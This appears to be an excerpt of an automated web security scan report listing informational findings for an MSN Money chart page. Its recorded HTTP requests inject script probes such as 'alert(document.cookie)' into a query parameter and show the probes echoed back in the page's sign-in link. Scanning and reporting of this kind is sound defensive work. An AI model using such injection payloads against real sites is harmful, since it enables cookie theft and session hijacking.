http://switch.redcated/action/MSN_enUS_Money
http://www.bing.com/customizeBrowser
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.live.com/live/search/search.xml
http://www.morningstar.com/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.telekurs.com/tkfich_index/tkhoch_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296392443&rver=5.5.4177.0&wp=MBI&wreply=http://moneycentral.redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=indu22b72%2522%253balert(1)%252f%252f2badde9cef5&lc=1033&id=229
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(1)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; userCh=4=1&8=0&20=0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 30 Jan 2011 13:00:43 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Length: 24731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296392443&rver=5.5.4177.0&wp=MBI&wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=indu22b72%2522%253balert(1)%252f%252f2badde9cef5&lc=1033&id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.217. http://redacted/investor/charts/chartdl.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/charts/chartdl.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js
http://batstrading.com/
http://bing.com/
http://calendar.live.com/
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://insidemsn.wordpress.com/
http://mail.live.com/
http://mail.live.com/?rru=compose
http://mail.live.com/?rru=contacts
http://mail.live.com/?rru=inbox
http://msn.whitepages.com/
http://msnportalmoney.112.2o7.net/b/ss/msnportalmoney/1/H.1--NS/0
http://myhomeredacted/
http://switch.redcated/action/MSN_enUS_Money
http://www.bing.com/customizeBrowser
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.live.com/live/search/search.xml
http://www.morningstar.com/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.telekurs.com/tkfich_index/tkhoch_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296392414&rver=5.5.4177.0&wp=MBI&wreply=http://moneycentral.redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=indu22b72%2522%253balert(document.cookie)%252f%252f2badde9cef5&lc=1033&id=229
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 30 Jan 2011 13:00:14 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Length: 24815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296392414&rver=5.5.4177.0&wp=MBI&wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=indu22b72%2522%253balert(document.cookie)%252f%252f2badde9cef5&lc=1033&id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.218. http://redacted/investor/charts/chartdl.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/charts/chartdl.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js
http://batstrading.com/
http://bing.com/
http://calendar.live.com/
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://insidemsn.wordpress.com/
http://mail.live.com/
http://mail.live.com/?rru=compose
http://mail.live.com/?rru=contacts
http://mail.live.com/?rru=inbox
http://msn.whitepages.com/
http://msnportalmoney.112.2o7.net/b/ss/msnportalmoney/1/H.1--NS/0
http://myhomeredacted/
http://switch.redcated/action/MSN_enUS_Money
http://www.bing.com/customizeBrowser
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.live.com/live/search/search.xml
http://www.morningstar.com/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.telekurs.com/tkfich_index/tkhoch_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296400095&rver=5.5.4177.0&wp=MBI&wreply=http://moneycentral.redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=indu22b72%2522%253balert(document.cookie)%252f%252f2badde9cef5&lc=1033&id=229
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 30 Jan 2011 15:08:15 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Length: 24815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296400095&rver=5.5.4177.0&wp=MBI&wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=indu22b72%2522%253balert(document.cookie)%252f%252f2badde9cef5&lc=1033&id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.219. http://redacted/investor/charts/chartdl.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/charts/chartdl.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js
http://batstrading.com/
http://bing.com/
http://calendar.live.com/
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://insidemsn.wordpress.com/
http://mail.live.com/
http://mail.live.com/?rru=compose
http://mail.live.com/?rru=contacts
http://mail.live.com/?rru=inbox
http://msn.whitepages.com/
http://msnportalmoney.112.2o7.net/b/ss/msnportalmoney/1/H.1--NS/0
http://myhomeredacted/
http://switch.redcated/action/MSN_enUS_Money
http://www.bing.com/customizeBrowser
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.live.com/live/search/search.xml
http://www.morningstar.com/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.telekurs.com/tkfich_index/tkhoch_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410346&rver=5.5.4177.0&wp=MBI&wreply=http://moneycentral.redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=indu22b72%2522%253balert(1)%252f%252f2badde9cef5&lc=1033&id=229
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 30 Jan 2011 17:59:06 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Length: 24731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410346&rver=5.5.4177.0&wp=MBI&wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=indu22b72%2522%253balert(1)%252f%252f2badde9cef5&lc=1033&id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
